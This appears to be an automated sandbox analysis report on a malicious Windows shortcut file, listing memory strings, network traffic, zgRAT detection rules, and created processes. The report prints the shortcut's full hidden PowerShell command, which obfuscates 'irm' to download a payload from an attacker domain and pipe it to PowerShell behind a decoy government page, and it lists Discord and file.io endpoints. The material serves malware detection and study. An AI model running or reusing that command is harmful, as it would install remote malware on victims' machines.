Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://gateway.discord.gg
Source: powershell.exe, 00000000.00000002.3950139560.0000028D953F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ministryofficedownloadcloudserver.scre
Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp, jKSjtQ8W7O.lnk	String found in binary or memory: http://ministryofficedownloadcloudserver.scre$did/78/
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ministryofficedownloadcloudserver.scree
Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz
Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz//78/
Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz//78/the
Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp, ConDrv.10.dr	String found in binary or memory: http://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
Source: powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3950139560.0000028D96C87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.4012171088.0000028DAD380000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198424E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/channels/
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/guilds/
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://file.io/
Source: edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
Source: svchost.exe, 00000008.00000003.1531647828.000001B078210000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gateway.discord.gg:443/?v=9&encording=json
Source: powershell.exe, 0000000A.00000002.1660548790.0000019842B97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019842BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://geolocation-db.com/jsonPhttp://www.google.com/maps/place/
Source: powershell.exe, 0000000A.00000002.1660548790.00000198427B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843831000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ministryofficedownloadcloudserver.screenpo
Source: powershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.000001984294A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz
Source: powershell.exe, 00000000.00000002.3950139560.0000028D96B1C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz//78/
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
Source: powershell.exe, 00000000.00000002.4003438851.0000028DA5371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4003438851.0000028DA522F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1660548790.00000198440FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1679172209.0000019852571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 0000000A.00000002.1660548790.0000019843F4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000000.00000002.3950139560.0000028D964C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pmo.gov.pk/site/404
Source: powershell.exe, 00000000.00000002.3950139560.0000028D951C1000.00000004.00000800.00020000.00000000.sdmp, jKSjtQ8W7O.lnk	String found in binary or memory: https://pmo.gov.pk/site/404;
Source: powershell.exe, 00000000.00000002.3947739594.0000028D94C90000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D93078000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D9312D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3944831943.0000028D930C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.3946938254.0000028D93340000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pmo.gov.pk/site/404;$did=
Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pmo.gov.pk/site/404v
Source: powershell.exe, 00000000.00000002.4012473386.0000028DAD47A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pmo.gov.pk/site/404y

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 203.101.184.118:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.135.234:443 -> 192.168.2.8:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.8:49732 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows shortcut file (LNK) contains suspicious command line arguments

Source: jKSjtQ8W7O.lnk

LNK file: -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/|Powershell

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADD6E00	10_2_00007FFB4ADD6E00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADDC93B	10_2_00007FFB4ADDC93B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADDCA90	10_2_00007FFB4ADDCA90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADDCA35	10_2_00007FFB4ADDCA35
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADEDD80	10_2_00007FFB4ADEDD80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADFC510	10_2_00007FFB4ADFC510
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FFB4ADDEDE0	10_2_00007FFB4ADDEDE0

Source: 10.2.powershell.exe.1985268eeb0.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.powershell.exe.1985ae70000.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000000A.00000002.1693611434.000001985AE70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: Process Memory Space: powershell.exe PID: 6588, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7656, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.1985268eeb0.4.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 10.2.powershell.exe.1985ae70000.6.raw.unpack, bTH3JYM6xmCPaL8sQ1f.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.evad.winLNK@26/23@17/9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkqd1a1j.3am.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: jKSjtQ8W7O.lnk

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLOG -WInDoWST HIDDe -NoeXI -NoprOFILE -noniNtErac -CommaN ping www.ministryof.gov.pk; nslookup www.Elpson.com; nslookup www.mproton.com; start https://pmo.gov.pk/site/404; $did='enpont.xyz/'; &('i'+'r'+'m') http://ministryofficedownloadcloudserver.scre$did/78/\|Powershell
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.ministryof.gov.pk	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.Elpson.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.mproton.com	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1892,i,10163335198657100473,3974397654279076089,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
